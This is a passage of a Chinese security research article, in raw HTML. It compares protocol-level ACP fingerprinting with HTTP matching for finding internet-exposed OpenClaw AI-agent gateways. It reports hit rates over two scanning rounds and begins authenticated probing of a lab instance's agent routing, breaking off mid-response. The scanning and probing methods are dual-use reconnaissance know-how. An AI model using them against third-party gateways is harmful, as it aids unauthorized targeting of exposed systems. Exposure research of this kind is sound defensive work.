rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第一轮（混合样本）</span></strong></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="text-align: center;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第二轮（确定资产）</span></strong></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">总目标数</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">78</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">954</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">不可达</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">22</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">520</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可达</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">56</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">434</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ACP 指纹命中</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">14</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">418</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">传统 HTTP 命中</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">30</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">428</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">两者共同命中</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">10</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">415</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">仅 ACP 命中</span></strong></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4</span></strong></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3</span></strong></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">仅传统 HTTP 命中</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">20</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">13</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可达但都未命中</span></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">22</span></p></div></div></td><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">-</span></p></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第一轮分析：公网混合样本</span></strong></p></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">第一轮测试的目标来自公网混合资产池，包含大量噪声（前端页、代理页、品牌页等），模拟真实测绘场景中的高干扰情况。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">实验结果显示，旧方案命中 30 个目标，其中有一部分是&#34;相关页面线索&#34;（如官网、文档站、社区页），而非真实的 ACP 网关。新方案命中 14 个，数量虽少，但直接对应 WebSocket 层的真实 ACP 端点，精度更高。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">关键发现：</span></strong><span leaf="">在 56 个可达目标中，有 </span><strong style="box-sizing: border-box;"><span leaf="">4 个仅被 ACP 指纹识别</span></strong><span leaf="">，传统 HTTP 方法完全遗漏。这 4 个目标经人工验证，确认为真实 OpenClaw 实例。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">结论：</span></strong><span leaf="">在高噪声环境下，新旧方案定位角度不同——旧方案偏广覆盖，新方案偏高精度。新方案能有效发现隐藏或非标准部署的真实网关。</span></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第二轮分析：确定资产大规模验证</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">第二轮测试的目标来自公开的 OpenClaw 测绘网站爬取结果，属于&#34;已知确定资产&#34;，用于验证新方案在大规模样本上的稳定性。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">基于 434 个可达端点的统计：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ACP 指纹命中率：418 / 434 = </span><strong style="box-sizing: border-box;"><span leaf="">96.3%</span></strong></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">传统 HTTP 命中率：428 / 434 = </span><strong style="box-sizing: border-box;"><span leaf="">98.6%</span></strong></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">两者一致命中：415 / 434 = </span><strong style="box-sizing: border-box;"><span leaf="">95.6%</span></strong></p></li></ul><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">数据显示，两套方案在大规模样本上高度一致，新方案稳定性验证通过。同时，仍有 </span><strong style="box-sizing: border-box;"><span leaf="">3 个端点仅被 ACP 指纹发现</span></strong><span leaf="">，说明即使在确定资产中，协议语义探测仍具备补充价值。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">结论：</span></strong><span leaf="">新方案在大规模样本上表现稳定，与传统方法一致性超过 95%，且仍能覆盖部分传统盲区。</span></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">验证结论：</span></strong></p></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">综合两轮实验，我们得出以下结论：</span></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">协议语义指纹在真实环境中有效且稳定</span></strong><span leaf=""> — 在大规模确定资产上达到 96.3% 命中率，与方案一致性超过 95%。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">能发现传统 HTTP 方法的漏网之鱼</span></strong><span leaf=""> — 第一轮捡漏 4 个，第二轮补充 3 个，累计 7 个目标仅被 ACP 指纹识别。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">两套方案定位角度不同，应配合使用</span></strong><span leaf=""> — 传统方法覆盖广（适合初筛），ACP 指纹精度高（适合确认真实网关）。在实际测绘中，建议</span><strong style="box-sizing: border-box;"><span leaf="">先 HTTP 初筛，再 ACP 复核</span></strong><span leaf="">，以提高识别准确性和覆盖完整性。</span></p></li></ol><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这组实验揭示了一个重要事实：在 AI Agent 基础设施测绘中，传统的 HTTP 字符串匹配已经不够用了。当目标刻意隐藏 Web 前端或使用非标准路径时，只有深入协议层的语义探测才能揭开真相。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">04 授权后深层探测：内部控制面的暴露与风险评估</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">前面的四层指纹已经足够完成高置信度的暴露面测绘。但为了验证 OpenClaw 作为&#34;编排器&#34;的深层协议特征，我们在实验室环境中完成了 Ed25519 设备签名与 Token 认证，进行深层语义探测。</span></p><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">⚠️ 注意：</span></strong><span leaf="">以下实验均在自有 OpenClaw 实例上完成，不涉及任何第三方目标。</span></p></div></div></div></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011223" data-ratio="0.782608695652174" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="552" src="https://wechat2rss.xlab.app/img-proxy/?k=fa5d029b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCkrZrY99aWXCmRJ8pFkvqGbquyicqSibCjIhiaBOV2gLJ4cFt11DoFKcs2gYWkiaGyDftfgBWoY6Y54ia8DtbZMzBlYCDsN38UNSago%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验 1</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">多 Agent 路由表验证</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验目的</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">验证 OpenClaw 内部是否维护 Agent 注册表</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">前提条件</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已完成认证</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">假设：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">作为编排器，OpenClaw 内部必然维护着一个 Agent 注册表，用于将 agent 请求路由到正确的 Agent。</span></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">验证方法：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">向网关发送指向不存在 Agent 的调度请求：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;type&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;req&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;id&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;...&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;method&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;agent&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;params&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;idempotencyKey&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;...&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;agentId&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;fake-agent-9999&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;method&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;health&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;params&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{},</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;timeout&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__number">10000</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">响应结果：</span></strong></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="swift"><code><span leaf="">{</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;type&#34;</span>: <span 